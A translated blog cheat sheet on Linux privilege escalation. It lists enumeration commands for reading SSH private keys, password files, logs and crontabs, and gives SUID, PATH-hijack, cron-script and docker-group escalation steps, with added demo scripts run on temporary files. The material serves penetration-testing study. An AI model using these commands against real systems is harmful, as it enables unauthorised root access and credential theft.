Linux Privilege Escalation Summary

Chang'an rebellion 2020-11-09 19:54:41
Tags: summary, privilege escalation, linux

Reference link :
The essence of penetration testing is information gathering, and the first step is to collect as much of it as possible. The general idea is to use what is collected to find usable documents, scripts, software, users, kernel vulnerabilities, hijacking opportunities, platform-specific vulnerabilities, framework vulnerabilities, components and so on, then write or run a malicious command, script or shell, or add a high-privilege user, escalate, and go on to further exploitation.
On the target machine, the information to collect is roughly the following:

Kernel, operating system and device information

uname -a                 Print all available system information
uname -r                 Kernel version
uname -n                 System hostname
uname -m                 Machine architecture (64-bit / 32-bit)
hostname                 System hostname
cat /proc/version        Kernel version and the compiler that built it
cat /etc/*-release       Distribution information
cat /etc/issue           Distribution information (pre-login banner)
cat /proc/cpuinfo        CPU information
cat /etc/lsb-release     # Debian / Ubuntu
cat /etc/redhat-release  # Red Hat / CentOS
ls /boot | grep vmlinuz- Installed kernel images

Users and groups

cat /etc/passwd          List all users on the system
cat /var/mail/root       Mail for root (job output, notifications, sometimes credentials)
cat /var/spool/mail/root
cat /etc/group           List all groups on the system
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   List all UID-0 (superuser) accounts
whoami                   Current user
w                        Who is currently logged in and what they are doing
last                     List of the most recent logins
lastlog                  Last login of every user
lastlog -u <username>    Last login of the specified user
lastlog | grep -v "Never"   Only users who have logged in at least once
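As an added example that is not part of the original post, the following script applies the UID-0 check above to an /etc/passwd-format file and adds two checks worth making at the same time: accounts whose password field is empty, and accounts that still have a real login shell. The passwd contents are constructed for the demo (`toor`, `guest`, `svc` and `alice` are made-up accounts); on a target, point the functions at the real /etc/passwd.

```shell
#!/bin/sh
# Added example (not from the original post). Runs the UID-0 check over an
# /etc/passwd-format file and adds two related checks. The sample file is
# constructed for the demo; on a target, pass /etc/passwd instead.

# Accounts whose UID is 0. On a sane system only root; a second UID-0 entry
# (here "toor") is a classic backdoor left by an earlier intruder.
uid0_accounts() {
    grep -v '^#' "$1" | awk -F: '$3 == 0 { print $1 }'
}

# Accounts whose password field in passwd itself is empty ("name::uid:...").
# Normally the field is "x" and the hash lives in /etc/shadow; an empty field
# means no password is required at all.
nopass_accounts() {
    grep -v '^#' "$1" | awk -F: '$2 == "" { print $1 }'
}

# Accounts with a real login shell. A cracked or guessed password only helps
# for accounts that are not locked to nologin or false.
login_shell_accounts() {
    grep -v '^#' "$1" | awk -F: '$7 !~ /(nologin|false)$/ { print $1 }'
}

# Write the constructed sample passwd to the given path.
write_sample_passwd() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:backdoor:/root:/bin/sh
guest::1001:1001:guest:/home/guest:/bin/bash
svc:x:1002:1002:service:/var/lib/svc:/bin/false
alice:x:1000:1000:alice:/home/alice:/bin/bash
EOF
}

demo() {
    f=$(mktemp)
    write_sample_passwd "$f"
    echo "UID-0 accounts:       $(uid0_accounts "$f" | xargs)"
    echo "Empty password field: $(nopass_accounts "$f" | xargs)"
    echo "Real login shells:    $(login_shell_accounts "$f" | xargs)"
    rm -f "$f"
}

demo
```

The three checks are kept as separate functions so each can be run on its own against /etc/passwd; the grep strips comment lines, which some hardened builds add to the file.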

User privilege information

whoami                   Current user name
id                       Current user's UID, GID and group memberships
cat /etc/sudoers         Who may run what as root via sudo (normally readable only by root)
sudo -l                  What the current user may run through sudo, and as which user

Environment information

env                      Show environment variables
set                      Show all shell variables and functions, not only exported ones
echo $PATH               Executable search path
history                  Command history of the current user
pwd                      Print the working directory
cat /etc/profile         System-wide default variables and login settings
cat /etc/shells          Valid login shells
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout

Processes and services

ps aux
ps -ef
cat /etc/services        Port-to-service-name map (an entry here does not mean the service is running)

Processes running as root

ps aux | grep root
ps -ef | grep root

Check the installed software

ls -alh /usr/bin/
ls -alh /sbin/
ls -alh /var/cache/yum/
dpkg -l

Services / plugins

Check for insecure service configurations and for plugins with known vulnerabilities.

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'   # /etc/ entries with any read bit set (nearly everything; narrow the regex to the "other" triplet for world-readable files)

Scheduled tasks

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Are passwords stored in clear text?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'   # single quotes, so the shell does not expand $password

Are there SSH private keys?

cat ~/.ssh/authorized_keys
cat ~/.ssh/
cat ~/.ssh/identity
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key

Other users or hosts communicating with this machine

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on

Log files

cat /var/log/boot.log
cat /var/log/cron
cat /var/log/syslog
cat /var/log/wtmp
cat /var/run/utmp
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Note: other log files commonly worth reading under /var/log: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.log, mail.warn, messages, syslog, udev, wtmp

Upgrading to an interactive shell

python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import os; os.system("/bin/bash")'
/bin/sh -i

SUID && SGID privilege escalation

Reference material

find / -perm -1000 -type d 2>/dev/null   # Sticky bit - only the directory owner or the file owner can delete or rename files here.
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - runs as the file's group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - runs as the file's owner, not the user who started it.

find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null   # SGID or SUID (the parentheses matter: without them -type f applies only to the SUID branch)
for i in $(locate -r "bin$"); do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done   # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (quicker search)

Find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied):
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
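The SGID-or-SUID one-liners above (and the ones repeated in the SUID section further down) are easy to get subtly wrong because find's implicit "-a" binds tighter than "-o". As an added example that is not part of the original post, the script below builds a small directory tree it can run over without root and shows the difference between the unparenthesised and the parenthesised form; the file and directory names are made up for the demo.

```shell
#!/bin/sh
# Added example (not from the original post). Builds a tree with one SUID file,
# one SGID file, one SGID directory and one plain file, then runs the page's
# SUID/SGID find with and without parentheses. Without them,
# "-perm -g=s -o -perm -u=s -type f" means "(SGID) OR (SUID AND regular file)",
# so the SGID directory leaks into the result.

make_tree() {
    d=$(mktemp -d)
    mkdir "$d/sgid_dir";   chmod 2755 "$d/sgid_dir"   # SGID directory
    : > "$d/suid_bin";     chmod 4755 "$d/suid_bin"   # SUID file
    : > "$d/sgid_bin";     chmod 2755 "$d/sgid_bin"   # SGID file
    : > "$d/plain";        chmod 0755 "$d/plain"      # neither
    printf '%s\n' "$d"
}

# The unparenthesised form from the page: -type f only applies to the SUID branch.
naive_suid_sgid_count() {
    find "$1" -perm -g=s -o -perm -u=s -type f 2>/dev/null | wc -l | tr -d ' '
}

# Corrected form: group the permission tests, then restrict to regular files.
suid_sgid_count() {
    find "$1" \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null | wc -l | tr -d ' '
}

# Detailed listing as used on a real target (start it at / there): SUID or
# SGID regular files, at most 3 levels deep, in ls -ld form. -maxdepth must
# precede the other tests or find prints a warning.
list_suid_sgid() {
    find "$1" -maxdepth 3 \( -perm -4000 -o -perm -2000 \) -type f \
         -exec ls -ld {} \; 2>/dev/null
}

demo() {
    d=$(make_tree)
    echo "without parentheses: $(naive_suid_sgid_count "$d") hits (the SGID directory is included)"
    echo "with parentheses:    $(suid_sgid_count "$d") hits"
    list_suid_sgid "$d"
    rm -rf "$d"
}

demo
```

The same precedence rule applies to any find expression that mixes -o with -type, -user or -exec: put the alternatives in escaped parentheses, or the trailing tests and actions silently attach only to the last alternative.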

Writable / executable directories

find / -writable -type d 2>/dev/null        # directories writable by the current user
find / -perm -222 -type d 2>/dev/null       # directories writable by owner, group and others
find / -perm -o=w -type d 2>/dev/null       # world-writable directories

find / -perm -o=x -type d 2>/dev/null       # world-executable (traversable) directories

find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null   # world-writable and executable directories

Check installed tools (interpreters and compilers for running or building exploits)

find / -name perl*
find / -name python*
find / -name gcc*

With the information above as a basis, specific privilege escalation techniques can be applied.

Kernel exploit privilege escalation

If the target's kernel version is old, a kernel exploit is the first thing that comes to mind. Kali ships a local copy of the exploit-db archive, so the searchsploit command can be used to look up exploits matching the kernel version quickly.
The classic example is Dirty COW, CVE-2016-5195.
There are some pitfalls in the kernel exploit process. The most obvious is the environment: you do not know what the target machine lacks, so an exploit that compiles and runs smoothly locally often fails with some inexplicable error on the target. Many exploits are also unstable, and a careless attempt can crash the target, so kernel exploits are best kept as the last card.

SUID privilege escalation

SUID stands for Set owner User ID up on execution. It is an attribute Linux gives to an executable: when other users run the program, it executes with the privileges of the file's owner (SGID does the same for the file's group). Note that this only helps for escalation if the owner of the program is root (UID 0) or another privileged account and the SUID bit is set. Two caveats: the kernel ignores the SUID bit on interpreted scripts, and on filesystems mounted with nosuid the bit has no effect.
The following commands find all SUID executables:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

For example, old versions of nmap had an interactive mode from which the user could escape to a shell. If nmap is SUID, it runs with root privileges, and a root shell can be obtained through its interactive mode.

$ nmap --interactive   # run nmap in interactive mode
$ !sh                  # escape from the nmap shell to a system shell

Check the result with id: if the shell you land in is bash, it drops the effective UID back to the real UID unless started with -p, whereas /bin/sh on Debian-based systems is dash, which keeps it.

PATH environment variable privilege escalation

$PATH is an environment variable on Linux and Unix-like systems holding the colon-separated list of directories (the various bin and sbin directories) that the shell searches, in order, for an executable whenever a command is typed without a path. The superuser's PATH usually also contains /sbin and /usr/sbin so that administrative commands can be run conveniently.
The echo command shows the current user's PATH.
Pay attention to whether PATH contains "." (or any other directory you can write to). A "." entry means the current directory is searched, and if it comes early enough, binaries or scripts there run in preference to the real ones. For example, ls lists the files in a directory; but with "." at the front of PATH and an executable called ls in the current directory, typing ls no longer does that.
Create a file called ls in the current directory, add "." to the front of PATH, and type ls in that directory: what actually runs is "./ls", i.e. the executable named ls in the current directory.
This can be combined with SUID files: if a SUID program calls a system command by its bare name, that command can be hijacked by modifying PATH and planting a malicious file with the same name, making the program execute whatever we want. See the reference link:
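As an added example that is not part of the original post, the script below reproduces the "." in PATH hijack just described inside a temporary directory, as an unprivileged user, and puts the vulnerable pattern next to the hardened one. The fake ls, victim.sh and hardened.sh are made up for the demo; nothing here is SUID, so it shows the hijack mechanism rather than an actual privilege gain (with a root-owned SUID binary calling system("ls"), the planted ls would run as root).

```shell
#!/bin/sh
# Added example (not from the original post). Plants a fake ls, puts "." at the
# front of PATH, and runs a script that calls ls by bare name (victim.sh) and a
# script that resets PATH to a trusted value first (hardened.sh).

setup_hijack() {
    work=$(mktemp -d)
    mkdir "$work/evil"
    # Attacker's fake ls. A real one would e.g. copy /bin/sh somewhere and
    # chmod 4755 it; this one only announces that it ran.
    printf '#!/bin/sh\necho HIJACKED\n' > "$work/evil/ls"
    # Vulnerable program: calls ls through whatever PATH the caller supplies,
    # exactly like system("ls") inside a SUID binary.
    printf '#!/bin/sh\nls "$1"\n' > "$work/victim.sh"
    # Hardened program: pins PATH before calling anything, so "ls" can only
    # come from the trusted directories.
    printf '#!/bin/sh\nPATH=/usr/bin:/bin; export PATH\nls "$1"\n' > "$work/hardened.sh"
    chmod 755 "$work/evil/ls" "$work/victim.sh" "$work/hardened.sh"
    printf '%s\n' "$work"
}

# Run one of the programs the way the text describes: sitting in the directory
# that holds the fake ls, with "." at the front of PATH. Any PATH entry the
# attacker can write to works the same way; "." is just the common case.
run_with_dot_path() {   # $1 = work dir, $2 = program name
    ( cd "$1/evil" && PATH=".:$PATH" /bin/sh "$1/$2" "$1" )
}

demo() {
    w=$(setup_hijack)
    echo "victim.sh   -> $(run_with_dot_path "$w" victim.sh | head -n 1)"
    echo "hardened.sh -> $(run_with_dot_path "$w" hardened.sh | head -n 1)"
    rm -rf "$w"
}

demo
```

The hardened variant shows the two fixes that matter in a SUID program: reset PATH (or call commands by absolute path) before any lookup, and never trust the environment the caller hands over.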

Scheduled task privilege escalation

There may be scheduled tasks on the system. They are generally managed by crontab and run with the permissions of the user who owns them. A non-root user cannot list root's crontab, but the system-wide scheduled tasks under /etc/ can be listed.

ls -l /etc/cron*

By default these run with root privileges. If you are lucky enough to find an administrator who has left one of the scripts writable by any user, you can modify the script and wait for the root shell to connect back.
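As an added example that is not part of the original post, the script below parses system-crontab-format files (five time fields, a user field, then the command, as in /etc/crontab and /etc/cron.d/*) and reports the jobs whose command file, or the directory holding it, is world-writable. The crontab, backup.sh and sync.sh are constructed in a temporary directory for the demo; on a target, call writable_cron_targets on the real files.

```shell
#!/bin/sh
# Added example (not from the original post). Finds cron jobs whose target
# script can be replaced by anyone. The crontab and scripts are constructed
# for the demo; on a target, run writable_cron_targets over /etc/crontab and
# /etc/cron.d/*.

# Print "user command" for each job; skip comments, blank lines and VAR=value
# lines; handle @reboot/@daily-style lines, which have no time fields.
cron_jobs() {
    awk '/^[ \t]*#/ || /^[ \t]*$/ || /^[A-Za-z_][A-Za-z0-9_]*=/ { next }
         { if ($1 ~ /^@/) { user = $2; first = 3 } else { user = $6; first = 7 }
           cmd = ""
           for (i = first; i <= NF; i++) cmd = cmd (i > first ? " " : "") $i
           print user, cmd }' "$1"
}

# True if the path exists and has the other-write bit set. Mode bits are
# checked instead of "test -w" so the answer is the same whoever runs it
# (as root, test -w is true for everything). -H follows a symlinked path
# given on the command line, e.g. /bin -> usr/bin on merged-usr systems.
world_writable() {
    find -H "$1" -maxdepth 0 -perm -o=w 2>/dev/null | grep -q .
}

# For every job whose command starts with an absolute path, report whether
# the file itself or its directory is world-writable. A writable directory
# only helps if it is not sticky (as /tmp is) or we own the file.
writable_cron_targets() {
    cron_jobs "$1" | while read -r user cmd; do
        target=${cmd%% *}
        case $target in /*) ;; *) continue ;; esac
        if world_writable "$target"; then
            echo "$user $target (file world-writable)"
        elif world_writable "$(dirname "$target")"; then
            echo "$user $target (dir world-writable)"
        fi
    done
}

# Constructed scenario: one world-writable script, one script inside a
# world-writable directory, and one job pointing at a properly protected binary.
setup_cron_demo() {
    w=$(mktemp -d)
    mkdir "$w/bin"
    printf '#!/bin/sh\n' > "$w/backup.sh";   chmod 777 "$w/backup.sh"
    printf '#!/bin/sh\n' > "$w/bin/sync.sh"; chmod 755 "$w/bin/sync.sh"; chmod 777 "$w/bin"
    cat > "$w/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user command
*/5 * * * * root $w/backup.sh --quiet
0 3 * * *   root /bin/true
@reboot     root $w/bin/sync.sh
EOF
    printf '%s\n' "$w"
}

demo() {
    w=$(setup_cron_demo)
    writable_cron_targets "$w/crontab"
    rm -rf "$w"
}

demo
```

Per-user crontabs under /var/spool/cron have no user field, so for those the job parser would need to start the command at field 6 with the user taken from the file name; the writability check itself is the same.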

Abusing third-party services

Some services are bound only to the internal network or to localhost. Attacking them can give access to more sensitive files or, with luck, hit a remote root vulnerability.

netstat -antup   # list listening services and the processes behind them

If several users share a machine through docker and the current user is in the docker group, a container can be started directly with root inside it, and the host's /etc/passwd modified from there to escalate.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh   # mount the host root at /mnt and chroot into it
cat /etc/passwd                                         # after the chroot this is the host's /etc/passwd

After the chroot, /etc/passwd inside the container is the host's /etc/passwd, so a user can be appended to it directly, which achieves the escalation. Membership of the docker group is therefore equivalent to root on the host.
For other third-party software and services, see the reference link:
Beyond the above there are many more techniques in practice, for example running sudo directly, cracking hashes taken from the shadow file, or guessing the root password in various ways. In short, take stock of the system, understand the essentials, and apply them flexibly.

This article was written by [Chang'an rebellion]. Please include a link to the original when reposting. Thanks.
